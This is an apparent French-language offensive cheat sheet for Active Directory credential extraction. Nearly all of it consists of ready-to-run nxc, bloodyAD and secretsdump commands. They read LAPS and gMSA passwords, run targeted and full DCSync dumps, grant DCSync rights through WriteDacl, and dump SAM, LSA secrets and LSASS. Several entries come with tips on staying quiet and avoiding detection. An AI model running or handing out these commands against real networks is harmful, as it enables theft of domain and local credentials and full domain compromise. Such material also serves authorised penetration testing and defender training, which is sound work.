nxc ldap $DC -u $USER -p $PASS --lapsDescription: Lire les mots de passe LAPS de tous les hosts accessibles via l'ACL courante.
Exploitation
LAPS, gMSA, DCSync et secrets locaux : extraire les credentials sans les craquer.
nxc ldap $DC -u $USER -p $PASS --lapsDescription: Lire les mots de passe LAPS de tous les hosts accessibles via l'ACL courante.
nxc ldap $DC -u $USER -p $PASS --laps --computer $COMPUTERDescription: LAPS ciblé sur une machine précise pour éviter le bruit inutile.
nxc ldap $DC -u $USER -p $PASS --gmsaDescription: Lister les objets gMSA et tenter de lire leur secret si l'ACL le permet.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$GMSA$' --attr msDS-ManagedPasswordDescription: Extraire directement le blob de mot de passe gMSA via LDAP, décodable en NT hash.
secretsdump.py $DOMAIN/$USER:$PASS@$DC -just-dc-user $TARGET_USERDescription: DCSync ciblé sur un compte précis : récupère NT hash sans dump massif.
secretsdump.py $DOMAIN/$USER:$PASS@$DC -just-dcDescription: DCSync complet : tous les hashes NTLM du domaine. Bruyant, réserver à la fin.
nxc smb $DC -u $USER -p $PASS --ntds --user $TARGET_USERDescription: Alternative NXC pour extraire un hash NTDS sans passer par impacket.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add dcsync '$USER'Description: Donner les droits DCSync à un compte via WriteDacl sur la racine du domaine.
nxc smb $TARGET -u $USER -p $PASS --samDescription: Dump des comptes locaux depuis la SAM : hashes des admins locaux.
nxc smb $TARGET -u $USER -p $PASS --lsaDescription: Secrets LSA : comptes de service, mots de passe en cache, DCC2.
nxc smb $TARGET -u $USER -p $PASS -M nanodumpDescription: Dump LSASS via nanodump : plus discret qu'un procdump classique.
nxc smb $TARGET -u $USER -p $PASS --sam --lsaDescription: SAM + LSA en une passe : collecte complète des secrets locaux.